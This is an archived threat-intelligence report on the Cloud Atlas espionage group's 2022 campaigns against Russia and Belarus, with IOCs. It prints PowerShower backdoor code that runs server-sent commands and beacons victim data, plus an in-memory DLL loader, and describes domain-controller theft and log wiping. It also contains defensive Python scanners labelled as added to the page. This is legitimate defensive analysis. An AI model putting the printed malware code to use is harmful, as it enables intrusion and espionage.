{
	"id": "c63b35cf-fcfd-43c9-8217-6417bb7cf405",
	"created_at": "2026-04-09T02:22:48.015354Z",
	"updated_at": "2026-04-10T03:36:27.508668Z",
	"deleted_at": null,
	"sha1_hash": "efb50f457d596c98bb5a19e6429e5ba1714b9310",
	"title": "Cloud Atlas targets entities in Russia and Belarus amid the ongoing war in Ukraine",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 153488,
	"plain_text": "Cloud Atlas targets entities in Russia and Belarus amid the\r\nongoing war in Ukraine\r\nBy etal\r\nPublished: 2022-12-09 · Archived: 2026-04-09 02:15:53 UTC\r\nIntroduction\r\nCloud Atlas (or Inception) is a cyber-espionage group. Since its discovery in 2014, they have launched multiple,\r\nhighly targeted attacks on critical infrastructure across geographical zones and political conflicts. The group’s\r\ntactics, techniques and procedures (TTPs) have remained relatively static over the years. However, since the rapid\r\nescalation of the conflict between Russia and Ukraine in 2021 and especially after the outbreak of war in February\r\n2022, the scope of the group’s activities has narrowed significantly, with a clear focus on Russia, Belarus and\r\nconflicted areas in Ukraine and Moldova. Some evidence discovered while monitoring the group’s latest activities\r\nindicates that the group carried out a few successful intrusions and managed to gain full access to some of the\r\ntargeted environments.\r\nIn this publication, we discuss the tools, TTPs and victimology of Cloud Atlas in the last year. Interestingly, in\r\naddition to the usual malware used by Cloud Atlas, we discovered a new, previously never discussed tool: the\r\ngroup installs not only their signature modular espionage framework on the infected systems, but also uses the\r\nDLL to proxy connections through the victims’ machines.\r\nWhile we finalized this blogpost, another technical analysis of Cloud Atlas activity was published. While it\r\noverlaps with our findings to some extent, we believe that this report provides the additional information, insights\r\nand clarifications regarding the actors’ operations.\r\nVictimology\r\nThe group’s victims shift with the escalation of the political situation around Ukraine. 
In 2020-2021, the targets we observed included a wide range of ministries, diplomatic entities and industrial targets across the globe, including Western and Southeast Asia and Europe (especially, but not only, Eastern Europe). However, toward the end of 2021, amid the rising tensions between Russia and Ukraine, the focus of the group shifted to the Crimean Peninsula and the breakaway regions of Ukraine, Luhansk and Donetsk, as well as government, diplomatic, research and industry entities of Russia and Belarus.\r\nIn March-April 2022, Cloud Atlas was observed targeting entities in the pro-Russian Transnistria breakaway region of Moldova, officially known as the Transnistrian Moldavian Republic, where tensions were escalating amid fears that Russia would try to extend its sovereignty to Transnistria or use the republic’s territory for an offensive against Ukraine. Since June 2022, we have seen multiple persistent campaigns focused on very specific targets in Belarus, mainly in its transportation and military radio-electronics sectors, and in Russia, including the government sector and the energy and metal industries. The actors also maintain their focus on the Russian-annexed Crimean Peninsula and the Luhansk and Donetsk regions.\r\nhttps://research.checkpoint.com/2022/cloud-atlas-targets-entities-in-russia-and-belarus-amid-the-ongoing-war-in-ukraine/\r\nPage 1 of 12\r\nInitial infection\r\nCloud Atlas has used spear-phishing emails containing malicious attachments as its initial attack vector for many years. 
They mostly use public email services such as Yandex, Mail.ru and Outlook.com, but in some cases they also attempted to spoof the existing domains of other entities likely to be trusted by the target.\r\nFigure 1 – Example of a spear-phishing email (subject: “The Diplomatic Academy of the Ministry of Foreign Affairs, Diplomatic Service and Practice Journal”) sent by Cloud Atlas to one of the Russian ministries.\r\nThe email attachment is usually a Microsoft Office document that retrieves a malicious remote template from the attackers’ servers. The lures are carefully tailored to the target. We observed a variety of weaponized documents ranging from governmental documents to publicly available reports and articles, including business proposals and advertisements.\r\nFigure 2 – Examples of lure documents targeting Belarusian entities: a description of the “Comprehensive analysis of the economic and financial activities of a commercial organization” course from Belarusian State Economic University (left) and an advertisement from a company specializing in office equipment (right).\r\nFigure 3 – Examples of lure documents used by Cloud Atlas against the government and energy sectors (on the right, a resolution of the government of the Russian Federation on the application of legislation in the field of atomic energy in the Zaporozhye region).\r\nThe remote templates are RTF documents that exploit 5-year-old vulnerabilities in Microsoft Equation Editor, such as CVE-2017-11882 and CVE-2018-0802. For both the external templates and the later stages of the campaign, the attackers closely control who can access them by whitelisting the targets’ IP addresses. Cloud Atlas is known to collect victims’ IP information by first sending them reconnaissance documents, which contain no malicious functionality aside from fingerprinting the victim. 
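The remote-template technique described above leaves a static trace that can be checked before the attachment is ever opened: a Word document that fetches its template from the internet carries an attachedTemplate relationship with TargetMode set to External in word/_rels/settings.xml.rels. The following Python scanner is an added example for this page, not code from the original post or from Check Point. It builds a minimal, constructed archive in memory purely as test input and lists every external relationship in a document, so it can also be run offline over real attachments. The URL in the sample is a placeholder, not an indicator from this report.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# Relationship namespace shared by every OOXML .rels part
RELS_NS = 'http://schemas.openxmlformats.org/package/2006/relationships'
OFFICE_REL = 'http://schemas.openxmlformats.org/officeDocument/2006/relationships/'


def external_relationships(docx_bytes):
    # Return (rels part, relationship type, target) for every relationship whose
    # TargetMode is External. A remote template is an attachedTemplate relationship
    # in word/_rels/settings.xml.rels; other external types (oleObject, hyperlink)
    # are reported too so the analyst sees everything the document will reach for.
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith('.rels'):
                continue
            # untrusted input: prefer defusedxml over ElementTree in production
            root = ET.fromstring(zf.read(name))
            for rel in root.iter('{' + RELS_NS + '}Relationship'):
                if rel.get('TargetMode', 'Internal') != 'External':
                    continue
                rtype = rel.get('Type', '').rsplit('/', 1)[-1]
                findings.append((name, rtype, rel.get('Target', '')))
    return findings


def has_remote_template(docx_bytes):
    # True when the document will fetch its template from an external location
    return any(r[1] == 'attachedTemplate' for r in external_relationships(docx_bytes))


def _rels_part(entries):
    # Serialize a .rels part from (Id, Type, Target, TargetMode-or-None) tuples
    root = ET.Element('Relationships', xmlns=RELS_NS)
    for rid, rtype, target, mode in entries:
        attrs = {'Id': rid, 'Type': rtype, 'Target': target}
        if mode:
            attrs['TargetMode'] = mode
        ET.SubElement(root, 'Relationship', attrs)
    return ET.tostring(root, encoding='utf-8', xml_declaration=True)


def build_sample_docx(template_url=None):
    # Constructed test input: a minimal archive holding only the parts the scanner
    # inspects. Pass template_url to emulate a document wired to a remote template.
    entries = [('rId1', OFFICE_REL + 'styles', 'styles.xml', None)]
    if template_url:
        entries.append(('rId2', OFFICE_REL + 'attachedTemplate', template_url, 'External'))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w') as zf:
        zf.writestr('word/document.xml', b'<w:document/>')
        zf.writestr('word/_rels/settings.xml.rels', _rels_part(entries))
    return buf.getvalue()


if __name__ == '__main__':
    benign = build_sample_docx()
    remote = build_sample_docx('http://example.invalid/lure.dotm')
    print(external_relationships(benign))   # []
    print(external_relationships(remote))
    # [('word/_rels/settings.xml.rels', 'attachedTemplate', 'http://example.invalid/lure.dotm')]
```

Because the relationship is present in the file whether or not the server ever returns a malicious template, this check is independent of the IP whitelisting the attackers apply on the server side, and it works on the document alone, without network access.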
Whitelisting is easy to perform when the targeted entities are large enough to have their own ASN. The use of whitelisting significantly decreases the chances of the malicious components executing in sandboxes or research environments.\r\nPowerShower backdoor\r\nThe next stage of a Cloud Atlas attack is usually a PowerShell-based backdoor called PowerShower. PowerShower is stored on disk with simple obfuscation: Base64 encoding and string concatenation.\r\nFigure 4 – Example of PowerShower backdoor obfuscation.\r\nThe PowerShower versions we observed during our research offered reduced functionality compared to older versions, but the backdoor remained essentially unchanged, including function names such as HttpRequestG, HttpRequestP and dec64 that can be tracked across the different versions.\r\nOnce PowerShower is up and running, it mainly waits for further instructions from the command and control (C\u0026C) server. 
It may save a zip file sent from the server to %TEMP%\\PG.zip, or execute PowerShell commands that are sent Base64-encoded inside an XML file:\r\n$xmlfile = (gi $env:temp).fullname + \"\\\\temp.xml\";\r\n# $result holds the raw server response; it is written to temp.xml and parsed as XML\r\n[io.file]::WriteAllBytes($xmlfile, $result);\r\n$content = Get-Content $xmlfile;\r\n[xml]$doc = $content;\r\n# the command sits Base64-encoded in the model/ps element; dec64 decodes it and it is run as-is\r\n$command = dec64($doc.model.ps);\r\nInvoke-Expression $command;\r\nRemove-Item $xmlfile -force;\r\nFigure 5 – PowerShower code that parses the XML and executes the embedded PowerShell command.\r\nOne of the recent changes introduced in PowerShower is proxy awareness: if a proxy is enabled on the infected machine, the malware uses it when issuing requests to the C\u0026C server. 
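The two response types described in this section (a zip archive written to %TEMP%, or an XML document whose model/ps element carries a Base64-encoded PowerShell command that goes straight to Invoke-Expression) can be triaged offline from a captured C2 response without executing anything. The Python below is an added example, not code from the original post or from the backdoor. It assumes dec64 is a plain Base64 decode of UTF-8 text (the page does not show its definition), the sample responses are constructed, and the list of loader-style constructs it flags in the decoded command is the author of this example's choice.

```python
import base64
import io
import zipfile
import xml.etree.ElementTree as ET

ZIP_MAGIC = b'PK' + bytes([3, 4])

# Constructs worth a second look in a decoded command, e.g. a next-stage loader
INDICATORS = ['Invoke-Expression', 'iex', 'FromBase64String', 'Reflection.Assembly',
              'Net.WebClient', 'DownloadString']


def decode_ps_command(xml_bytes):
    # Mirror of the [xml]$doc / dec64($doc.model.ps) step, minus Invoke-Expression.
    # Assumption (not stated on the page): dec64 is a plain Base64 decode of UTF-8 text.
    root = ET.fromstring(xml_bytes)  # use defusedxml for untrusted input in production
    if root.tag != 'model':
        raise ValueError('unexpected root element: ' + root.tag)
    ps = root.find('ps')
    if ps is None or not ps.text:
        raise ValueError('missing model/ps element')
    return base64.b64decode(ps.text.strip()).decode('utf-8')


def flag_indicators(command):
    # Case-insensitive substring match; returns the matching entries of INDICATORS
    lowered = command.lower()
    return [k for k in INDICATORS if k.lower() in lowered]


def triage_response(data):
    # Classify a captured C2 response the way the backdoor would consume it,
    # without writing PG.zip or running the command.
    if data.startswith(ZIP_MAGIC):
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return {'kind': 'zip', 'members': zf.namelist()}
    stripped = data.lstrip()
    if stripped.startswith(b'<'):
        command = decode_ps_command(stripped)
        return {'kind': 'command', 'command': command, 'indicators': flag_indicators(command)}
    return {'kind': 'unknown', 'size': len(data)}


def make_command_response(ps_command):
    # Constructed sample of the XML tasking format shown above
    root = ET.Element('model')
    ET.SubElement(root, 'ps').text = base64.b64encode(ps_command.encode('utf-8')).decode('ascii')
    return ET.tostring(root)


def make_zip_response(members):
    # Constructed sample of a PG.zip-style archive
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w') as zf:
        for name in members:
            zf.writestr(name, b'placeholder')
    return buf.getvalue()


if __name__ == '__main__':
    print(triage_response(make_command_response('whoami /all')))
    print(triage_response(make_command_response('[System.Reflection.Assembly]::Load($dll_content)')))
    print(triage_response(make_zip_response(['office.ps1'])))
```

Run it on a temp.xml recovered from disk or on a response body from a proxy capture; the command comes back as text for review rather than being evaluated, which is the one thing the backdoor's own code path never does.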
In addition, the script now sends some basic data about the victim’s machine (OS major and minor versions and the PowerShell version) in the User-Agent header of the POST request:\r\nFunction HttpRequestP($url)\r\n{\r\n    $all=\"\";\r\n    # the POST body is read from %TEMP%\\pass.txt, which is then deleted\r\n    $p_t = (gi $env:temp).fullname + \"\\pass.txt\";\r\n    $content = [io.file]::ReadAllText($p_t);\r\n    Remove-Item $p_t -force -recurse;\r\n    $all=$content;\r\n    $http_request = New-Object -ComObject Msxml2.ServerXMLHTTP.6.0;\r\n    $http_request.open(\"POST\", $url, $false);\r\n    $http_request.setOption(2,$http_request.getOption(2));\r\n    # honor the user's proxy settings so the beacon follows the same path as browser traffic\r\n    $pr = Get-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\\";\r\n    if ( $pr.ProxyEnable -eq \"1\")\r\n    {\r\n        $http_request.setProxy(2, $pr.ProxyServer);\r\n    }\r\n    # OS and PowerShell versions are leaked to the server through the User-Agent string\r\n    $psv = $PSVersionTable.PSVersion.Major;\r\n    $wvmajor = [Environment]::OSVersion.Version.Major;\r\n    $wvminor = [Environment]::OSVersion.Version.Minor;\r\n    $http_request.SetRequestHeader(\"User-Agent\", \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT \" + $wvmajor + \".\" + $wvminor + \"; PS \" + $psv + \".00)\");\r\n    $http_request.send(\"$all\");\r\n    return $http_request.status;\r\n}\r\nFigure 6 – PowerShower proxy handling and User-Agent string concatenation.\r\nRtcpProxy tool\r\nOne of the interesting payloads received by PowerShower is a script called office.ps1. 
This script reflectively loads into memory a .NET DLL that is stored in the script gzip-compressed and Base64-encoded, and then calls the DLL’s StartMainXor function.\r\n$dll_compressed_base64=\"H4sIAAAAAAA\u003ctruncated\u003e\"\r\n$dll_compressed=[System.Convert]::FromBase64String($dll_compressed_base64)\r\n# gunzip the embedded assembly in memory; nothing is written to disk\r\n$ms=New-Object System.IO.MemoryStream(,$dll_compressed)\r\n$cs=New-Object System.IO.Compression.GzipStream($ms,[IO.Compression.CompressionMode]::Decompress)\r\n$br=New-Object System.IO.BinaryReader($cs)\r\n$dll_content=$br.ReadBytes(10485760)\r\n$br.Close()\r\n$cs.Close()\r\n$ms.Close()\r\n[System.Reflection.Assembly]::Load($dll_content)\r\n#$content_bytes=[tcp_ssl_simple.NetTcpSsl]::StartHello()\r\n#[abcd.Service]::StartHello()\r\n# Prototype:\r\n# StartMainXor(string host, string port, int number, int reconnect_sleep, int time_stop_delay_seconds, string hexkey)\r\n$content_bytes=[abcd.Service]::StartMainXor(\"\u003cserver_address\u003e\", \"11171\", 10, 7000, 15 * 60, \"010203BADC0DEF\")\r\nwrite-host \"DoneTest\"\r\nThis DLL is internally called rtcpsvc.dll and is responsible for relaying commands between two different servers. It is likely part of a chain of proxies used by the attackers. Multiple past reports noted that the actors rely heavily on a worldwide proxy network, but none mentioned that they achieved this with DLLs on Windows. Setting up proxies within compromised environments may also, in some cases, allow the actors to penetrate high-profile targets while reducing the risk of their network activity being discovered or blocked, as the activity appears to originate from trusted sources inside the country or industry.\r\nThe communication between the DLL and the hosts can be XOR-encrypted, depending on whether the DLL was executed with a key parameter or without.  
In all the cases we analyzed, the same key, “010203BADC0DEF”, was used for the XOR encryption. Other parameters provided when launching the DLL include the host and port of the remote peer, the number of connections, and the amount of time to sleep before reconnecting.\r\nFigure 7 – Overview of the Communication class responsible for communication between two peers.\r\nThe DLL reaches out to the specified remote host (Left) and receives 4 bytes in response. These bytes specify the length of the next message (command) to be received. It then connects to the host again and expects an XML response carrying a connect command. This XML response should contain the host and port of another (Right) peer. The DLL connects to the second host as well, notifies the first host of success, and starts relaying messages between them.\r\nFigure 8 – Function responsible for sending the connect result in XML format to the “Left” peer.\r\nLike the command execution status sent to the peers, the relayed messages themselves are in XML format, as are the commands received by the PowerShower backdoor.\r\nModular espionage framework\r\nInterestingly, the actors have made no significant changes to the core of their modular backdoor in the years since its discovery in 2014 by Kaspersky and Symantec. As described in those reports, we observed multiple samples of the Cloud Atlas modular backdoor. Each is an obfuscated DLL accompanied by an encrypted file, with both the DLL and the data file named using random words. For example, a DLL named beachmaster.dll was accompanied by an encrypted file named examinere. Each DLL has multiple randomly named export functions, only one of which is relevant. When the relevant export is called, the DLL decrypts and loads an embedded PE file. 
The loaded PE file then XOR-decrypts a hardcoded structure that tells it how to decrypt the companion file. For example, the hardcoded structure in the PE embedded in beachmaster.dll looks like this:\r\n0000h: C6 8E CA BF E5 DE 8E 74 1E 08 E3 FB 6D C1 79 3F  ÆŽÊ¿åÞŽt..ãûmÁy?\r\n0010h: E5 19 69 0C 55 74 54 F7 CF 15 9D AF 00 02 D9 55  å.i.UtT÷Ï..¯..ÙU\r\n0020h: 47 00 6C 00 6F 00 62 00 61 00 6C 00 5C 00 49 00  G.l.o.b.a.l.\\.I.\r\n0030h: 54 00 4F 00 4A 00 75 00 43 00 65 00 69 00 00 00  T.O.J.u.C.e.i...\r\n0040h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n[…truncated…]\r\n0090h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n00A0h: 65 00 78 00 61 00 6D 00 69 00 6E 00 65 00 72 00  e.x.a.m.i.n.e.r.\r\n00B0h: 65 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  e...............\r\n00C0h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n[…truncated…]\r\n0110h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n0120h: 7D CB BE 31 61 A3 10 54 8F D7 31 71 5E E7 21 86  }Ë¾1a£.T.×1q^ç!†\r\n0130h: 13 E1 CF 96                                      .áÏ–\r\nThe structure consists of an AES-256 key (offsets 0x00–0x1F) used to decrypt the companion file, an event name (UTF-16LE, from 0x20; here Global\\ITOJuCei) that prevents multiple instances of the malware from running, the file name of the encrypted companion file (UTF-16LE, from 0xA0; here examinere), and a SHA1 hash (0x120–0x133). The SHA1 at the end of the structure serves as an integrity check: it must match the SHA1 computed over the first 0x120 bytes of the configuration.\r\nThe payload then decrypts the companion file, using the AES-256 key from the config and the last 16 bytes of the companion file as the IV. It then LZNT1-decompresses the result to reveal another PE file. The newly revealed DLL also has an encrypted configuration hardcoded inside. 
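The structure above can be carved and its SHA1 trailer checked with the following Python, an added example for this page rather than code from the original post or from the malware. The offsets are the ones visible in the dump; the fixed 0x80-byte sizes of the two UTF-16LE string fields are inferred from where the file name starts (0xA0) and where the hash starts (0x120), and the key bytes in the sample are constructed test data. The event name and companion file name in the sample are the ones shown in the dump.

```python
import hashlib

# Layout of the XOR-decrypted structure, offsets as seen in the dump above.
KEY_OFF, KEY_LEN = 0x00, 0x20       # AES-256 key
EVENT_OFF, EVENT_LEN = 0x20, 0x80   # event name, UTF-16LE, zero padded (size inferred)
FILE_OFF, FILE_LEN = 0xA0, 0x80     # companion file name, UTF-16LE, zero padded (size inferred)
HASH_OFF, HASH_LEN = 0x120, 0x14    # SHA1 over the preceding 0x120 bytes
CONFIG_LEN = HASH_OFF + HASH_LEN    # 0x134


def _utf16z(buf):
    # Decode a zero-padded UTF-16LE field up to its first NUL character
    return buf.decode('utf-16-le', errors='replace').split(chr(0), 1)[0]


def parse_config(blob):
    # Split the structure into its fields and verify the trailing SHA1.
    # sha1_ok False means the blob was decrypted with the wrong XOR key,
    # is truncated, or was patched after the fact.
    if len(blob) < CONFIG_LEN:
        raise ValueError('config too short: %d bytes' % len(blob))
    expected = blob[HASH_OFF:HASH_OFF + HASH_LEN]
    actual = hashlib.sha1(blob[:HASH_OFF]).digest()
    return {
        'aes_key': blob[KEY_OFF:KEY_OFF + KEY_LEN],
        'event_name': _utf16z(blob[EVENT_OFF:EVENT_OFF + EVENT_LEN]),
        'companion_file': _utf16z(blob[FILE_OFF:FILE_OFF + FILE_LEN]),
        'sha1_ok': expected == actual,
    }


def _utf16_field(text, size):
    # Encode text as UTF-16LE and zero pad to the fixed field size
    raw = text.encode('utf-16-le')
    if len(raw) > size - 2:
        raise ValueError('field too long')
    return raw + bytes(size - len(raw))


def build_config(aes_key, event_name, companion_file):
    # Constructed sample config in the same layout with a correct SHA1 trailer.
    # Used here as test input only; the key passed in is test data, not a real key.
    if len(aes_key) != KEY_LEN:
        raise ValueError('AES-256 key must be 32 bytes')
    body = aes_key + _utf16_field(event_name, EVENT_LEN) + _utf16_field(companion_file, FILE_LEN)
    return body + hashlib.sha1(body).digest()


if __name__ == '__main__':
    # event name and companion file name taken from the dump; key is test data
    sample = build_config(bytes(range(32)), 'Global' + chr(92) + 'ITOJuCei', 'examinere')
    parsed = parse_config(sample)
    print(parsed['event_name'], parsed['companion_file'], parsed['sha1_ok'])
    tampered = bytearray(sample)
    tampered[FILE_OFF] ^= 1           # flip one bit of the file name
    print(parse_config(bytes(tampered))['sha1_ok'])
```

A failed hash check is the quickest way to tell that the XOR key recovered for a new sample is wrong before any time is spent on the AES stage. The text next describes the configuration embedded in the second-stage DLL, which is decrypted in a similar way.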
The decryption of the second-stage DLL’s own configuration follows the same pattern as the earlier stages, and the resulting config tells the malware how to communicate with its C\u0026C server.\r\nThe malware still lives up to its “cloud” name and uses cloud storage providers to communicate over the WebDAV protocol. In the samples we observed, Cloud Atlas used OpenDrive as its service of choice. The OpenDrive credentials are hardcoded in the encrypted configuration, along with two URIs (one for uploading files from the victim, one for downloading files from the server) and the pattern and extensions used to generate the names of the uploaded files. Data sent to the service, such as information about the victim’s environment, is saved as files under the upload URI specified in the configuration. The payload polls the download URI for the next payload and, once it has downloaded it, issues a request to the server to remove the downloaded file. The first module, sent automatically, is the stealer module, which collects login and cookie data from multiple browsers on the victim’s machine.\r\nIncident response report\r\nWhile investigating Cloud Atlas activity, we came across an incident response report written in Russian that was uploaded to VirusTotal from an IP address located in Donetsk. This report (no TLP label specified) provides an analysis of a few successful intrusions that occurred in June. These intrusions were discovered only in the later stages, when the attackers already had full access to the entire network, including the domain controller. 
Although not all the information in the report is precise and well detailed, we can cautiously extract some of the group’s additional TTPs during the later stages of the attack:\r\n- After gaining access to the domain controller, the actors extract a snapshot of its database (NTDS.dit) using the ntdsutil utility and copy it to their server for offline analysis and extraction of password hashes.\r\n- To reach machines inside the victim organization’s network, the attackers use the infected computers of ordinary users, from which they connect via RDP to the domain controller. They use existing domain accounts after changing their permissions, or create accounts with similar names by changing one or two letters. The actors conduct their primary activities (RDP or SSH to other servers, endpoints or network equipment) from the domain controller, blending in with regular sysadmin operations.\r\n- Additional tools used by the attackers include Advanced Port Scanner (version 2.5.3869, with a Russian interface), the Far file manager, Chocolatey, AnyDesk and PuTTY (copied to the servers and deleted after the task is completed). The actors also run Python 3 scripts on multiple servers to perform a variety of operations, such as finding and deleting all records of connections to webdav.opendrive.com from the Squid proxy server logs; copying correspondence from Telegram clients, saved passwords and browser history; and brute-forcing MikroTik routers.\r\nIt is not clear from the report which organizations or entities were the victims of these attacks.\r\nConclusion\r\nCloud Atlas continuously and persistently targets entities of interest. 
With the escalation of the conflict between Russia and Ukraine, their focus for the past year has been on Russia and Belarus and their diplomatic, government, energy and technology sectors, and on the annexed regions of Ukraine.\r\nCloud Atlas continues to use the simple but effective method of social engineering, using spear-phishing emails to compromise their targets. In the first stage of the attack, the actors use Word documents with remote templates, usually whitelisted for a particular target, which makes the phishing documents almost undetectable. Judging by the fact that the group continues to be very active despite only minor changes in TTPs, their methods seem to be successful. Not only do they manage to penetrate their targets and expand their initial access to the entire domain, but they can also use them as proxies for other operations.\r\nHarmony Email \u0026 Office deploys between the inbox and its native security. The solution secures inbound, outbound, and internal email from phishing attacks that evade platform-provided solutions and email gateways. It works with these other solutions and doesn’t require any MX record changes that broadcast security protocols to hackers.\r\nCheck Point’s Threat Emulation protects networks against unknown threats in web downloads and e-mail attachments. The Threat Emulation engine picks up malware at the initial phase, before it enters the network. 
The engine quickly quarantines the files and runs them in a virtual sandbox environment that imitates a standard operating system, to discover malicious behavior at the exploit phase.\r\nIOCs\r\nDocuments, scripts and payloads (MD5)\r\na34d585f66fc4582ed709298d00339a9\r\nb1aad1ed2925c47f848f9c86a4f35256\r\nf58ad9ee5d052cb9532830f59ecb5b84\r\n57c44757d7a43d3bc9e64ec5c5e5515d\r\n41d2627522794e9ec227d72f842edaf7\r\nf95ceca752d219dbc251cca4cd723eae\r\n044e167af277ca0d809ce4289121a7b5\r\n1139c39dda645f4c7b06b662083a0b9d\r\n3399deafaa6b91e8c19d767935ae0908\r\nbd9907dd708608bd82bf445f8c9c06ab\r\nedc96c980bbc85d83dcd4dca49ca613f\r\nee671a205b0204fa1a6b4e31c9539771\r\n5488781d71b447431a025bd21b098c2c\r\n16fbbafa294d1f4c6c043d89138d1b60\r\n5bbc3730c943b89673453176979d6811\r\nb684f3ee5a316e7fbcfa95ebcf86dedc\r\nae74f2bfd671e11828a1ae040fe6d48c\r\n2a21265df0bdd70a96551d9d6104b352\r\na8a93fa8ef221de5ee3d110cfc85243d\r\neb527d1682bfbed5d9346e721c38c6f5\r\nae828e3c03cc1aaedc43bb391e8b47ed\r\nc7a1dd829b03b47c6038afa870b2f965\r\nc2064c7f4826c46bc609c472597366fd\r\n89d40dd2db9c2cfd6a03b20b307dcdec\r\nd236d8fda2b7d6fd49b728d57c92a0a9\r\n9b05080490d51a7d2806a0d55d75c7ff\r\nd5a40e2986efd4a182bf564084533763\r\n077b71298ce31832ae43e834b7e6c080\r\nf68e64dacd046289d4222098ee421478\r\n81932933422d4bc4ece37472f9eb3ddc\r\nd0d728856a91710df364576e05f2113e\r\n94283807d0c97b3adb8f4ab45fffb5bc\r\n0e9147b824bc1d2507984ccd2a36d507\r\ndc3faa6840d1b5fd296d71ee8877254e\r\naa04bfcc675c73be1238fa953e19c4cf\r\n789afbe3a173d13d0b3700da6a629e15\r\nacbbc6fea0dbbe7cba511b450cc2b758\r\ne79833c9f758775ba0d82b8f4c8d2981\r\n3609ca3013d29fb824805b9a996eff70\r\n956f2241e81345d6507d0cd43499dba1\r\na3ba37cde2644ed6345d2c74ce25bfd8\r\na7a004e7118c986f1e07c87ce52a60e5\r\nb7b71b35fbfd119319015b04de817b3c\r\nf29cbc7639b53003fb33d8b20b9c0b59\r\nDomains\r\ndesktoppreview[.]com\r\ngettemplate[.]org\r\ndriversolution[.]net\r\ntranslate-news[.]net\r\ntechnology-requests[.]net\r\nprotocol-list[.]com\r\ncomparelicense[.]com\r\nsupport-app[.]net\r\nremote-convert[.]com\r\nIPs\r\n146.70.88.123\r\n185.227.82.21\r\nSource: https://research.checkpoint.com/2022/cloud-atlas-targets-entities-in-russia-and-belarus-amid-the-ongoing-war-in-ukraine/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://research.checkpoint.com/2022/cloud-atlas-targets-entities-in-russia-and-belarus-amid-the-ongoing-war-in-ukraine/"
	],
	"report_names": [
		"cloud-atlas-targets-entities-in-russia-and-belarus-amid-the-ongoing-war-in-ukraine"
	],
	"threat_actors": [
		{
			"id": "b740943a-da51-4133-855b-df29822531ea",
			"created_at": "2022-10-25T15:50:23.604126Z",
			"updated_at": "2026-04-10T02:00:05.259593Z",
			"deleted_at": null,
			"main_name": "Equation",
			"aliases": [
				"Equation"
			],
			"source_name": "MITRE:Equation",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "77b28afd-8187-4917-a453-1d5a279cb5e4",
			"created_at": "2022-10-25T15:50:23.768278Z",
			"updated_at": "2026-04-10T02:00:05.266635Z",
			"deleted_at": null,
			"main_name": "Inception",
			"aliases": [
				"Inception Framework",
				"Cloud Atlas"
			],
			"source_name": "MITRE:Inception",
			"tools": [
				"PowerShower",
				"VBShower",
				"LaZagne"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "04a7ebaa-ebb1-4971-b513-a0c86886d932",
			"created_at": "2023-01-06T13:46:38.784965Z",
			"updated_at": "2026-04-10T02:00:03.099088Z",
			"deleted_at": null,
			"main_name": "Inception Framework",
			"aliases": [
				"Clean Ursa",
				"Cloud Atlas",
				"G0100",
				"ATK116",
				"Blue Odin"
			],
			"source_name": "MISPGALAXY:Inception Framework",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "02c9f3f6-5d10-456b-9e63-750286048149",
			"created_at": "2022-10-25T16:07:23.722884Z",
			"updated_at": "2026-04-10T02:00:04.72726Z",
			"deleted_at": null,
			"main_name": "Inception Framework",
			"aliases": [
				"ATK 116",
				"Blue Odin",
				"Clean Ursa",
				"Cloud Atlas",
				"G0100",
				"Inception Framework",
				"Operation Cloud Atlas",
				"Operation RedOctober",
				"The Rocra"
			],
			"source_name": "ETDA:Inception Framework",
			"tools": [
				"Lastacloud",
				"PowerShower",
				"VBShower"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775701368,
	"ts_updated_at": 1775792187,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/efb50f457d596c98bb5a19e6429e5ba1714b9310.pdf",
		"text": "https://archive.orkl.eu/efb50f457d596c98bb5a19e6429e5ba1714b9310.txt",
		"img": "https://archive.orkl.eu/efb50f457d596c98bb5a19e6429e5ba1714b9310.jpg"
	}
}